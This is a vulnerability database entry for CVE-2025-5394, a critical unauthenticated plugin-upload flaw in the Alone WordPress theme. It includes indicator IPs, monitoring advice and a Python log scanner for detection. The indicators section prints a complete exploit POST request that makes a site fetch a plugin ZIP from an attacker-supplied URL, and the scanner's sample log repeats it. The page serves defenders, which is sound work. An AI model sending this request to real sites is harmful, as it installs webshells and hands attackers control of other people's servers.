cbcvebase.
CVE-2025-5394
published 2025-07-15

CVE-2025-5394: The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on…

Priority: P1 · 91 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 47.81% (98.7th percentile)
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3. This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution. CVE-2025-54019 is likely a duplicate of this.

Affected

1 range

Vendor        Product        Version range   Fixed in
bearsthemes   bears_backup   <= 2.0.0        (not listed)

Detection & IOCs (extracted from sources)

ip: 193.84.71.244
ip: 87.120.92.24
ip: 146.19.213.18
url: /wp-admin/admin-ajax.php?action=alone_import_pack_install_plugin
command: POST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f<url>%2fplugin%2f<file>.zip
path: /wp-content/themes/alone/
  • Monitor for POST requests to /wp-admin/admin-ajax.php with action=alone_import_pack_install_plugin or action=beplus_import_pack_install_plugin, which indicate exploitation attempts of CVE-2025-5394.
  • Look for newly created administrator accounts, suspicious ZIP/plugin folders in the WordPress plugins directory, or newly installed file manager plugins as indicators of post-exploitation activity.
  • The vulnerable function alone_import_pack_install_plugin() is exposed via the wp_ajax_nopriv_ hook, meaning it is accessible to unauthenticated users; alert on any unauthenticated AJAX calls invoking this action.
  • Attackers supply a remote source URL in the POST data's plugin_source parameter pointing to a ZIP archive containing a webshell; inspect the POST body for external URLs in the data[plugin_source] field.
  • Attackers deploy password-protected PHP backdoors that allow persistent remote command execution via HTTP requests; hunt for newly uploaded PHP files in plugin directories following exploitation.
  • The Nuclei template uses the action parameter value 'beplus_import_pack_install_plugin', while Wordfence and BleepingComputer report the action as 'alone_import_pack_install_plugin'. Both action names should be monitored, as the template may reflect an alias or alternate hook name used in some theme versions.
  • The vulnerability affects Alone theme versions up to and including 7.8.3; version 7.8.5 is the patched release. Version 7.8.4 is referenced in the Bears Backup chain (CVE-2025-5396) but is NOT the fixed version; only 7.8.5 is confirmed safe.
  • CVE-2025-5394 can be chained with CVE-2025-5396 (Bears Backup plugin RCE) on sites running Alone theme 7.8.4 and older, where the Alone theme flaw is used to install the Bears Backup plugin, which then enables full RCE.
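The detection guidance above can be turned into a small log-scanning check. The following is an added example, not code from this page, from Wordfence, or from the Alone theme: it parses combined-format web server log lines, flags requests to /wp-admin/admin-ajax.php whose action is either of the two reported values, and raises the severity when data[plugin_source] points at a host outside the site. Access logs do not record POST bodies, so the trailing body="..." field is an assumed convention standing in for a WAF or ModSecurity audit log; the log lines, IP addresses, hostnames and the site_hosts parameter are all constructed for the demo.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Both action values reported for CVE-2025-5394 should be monitored.
SUSPECT_ACTIONS = {
    "alone_import_pack_install_plugin",
    "beplus_import_pack_install_plugin",
}
TARGET_PATH = "/wp-admin/admin-ajax.php"

# Combined log format plus an optional trailing body="..." field. The body
# field is a constructed convention for this example: real access logs do not
# record POST bodies, so that data normally comes from a WAF/audit log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
    r'(?:.*? body="(?P<body>[^"]*)")?'
)


def is_external(url, site_hosts):
    """True when url is an absolute http(s) URL whose host is not one of ours."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and (parts.hostname or "") not in site_hosts


def analyze_request(ip, target, body="", site_hosts=frozenset()):
    """Return a finding dict when the request hits the vulnerable AJAX action, else None."""
    split = urlsplit(target)
    if split.path != TARGET_PATH:
        return None
    params = parse_qs(split.query)
    params.update(parse_qs(body))  # body parameters take precedence over the query string
    action = params.get("action", [""])[0]
    if action not in SUSPECT_ACTIONS:
        return None
    # parse_qs decodes data%5Bplugin_source%5D into the key data[plugin_source].
    plugin_source = params.get("data[plugin_source]", [""])[0]
    external = is_external(plugin_source, site_hosts)
    return {
        "ip": ip,
        "action": action,
        "plugin_source": plugin_source,
        # A remote ZIP source is the exploitation pattern; a bare call to the
        # action still merits an alert because the hook is unauthenticated.
        "severity": "high" if external else "medium",
    }


def scan_log(lines, site_hosts=frozenset()):
    """Parse each log line and collect findings for the vulnerable action."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m["ip"], m["target"], m["body"] or "", site_hosts)
        if finding:
            finding["ts"] = m["ts"]
            findings.append(finding)
    return findings


# Constructed sample log lines (not real traffic); addresses and hosts are reserved example values.
SAMPLE_LOG = [
    '203.0.113.10 - - [15/Jul/2025:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0" '
    'body="action=alone_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2fremote.example%2fplugin%2fpayload.zip"',
    '198.51.100.7 - - [15/Jul/2025:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin HTTP/1.1" 403 199 "-" "curl/8.0"',
    '192.0.2.5 - - [15/Jul/2025:10:00:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 20 "-" "Mozilla/5.0" body="action=heartbeat&_nonce=abc"',
    '192.0.2.6 - - [15/Jul/2025:10:00:04 +0000] "GET /wp-content/themes/alone/style.css HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG, site_hosts={"blog.example"}):
        print(f"{f['ts']} {f['ip']} {f['severity'].upper()} action={f['action']} "
              f"source={f['plugin_source'] or '(none)'}")
```

On the sample input the first two lines are flagged (the POST with a remote ZIP source as high, the unauthenticated GET probe as medium) and the heartbeat call and theme asset request are ignored. The 403 on the probe is deliberately still reported: a blocked attempt is evidence of scanning against this CVE and worth correlating with the listed source IPs.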

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL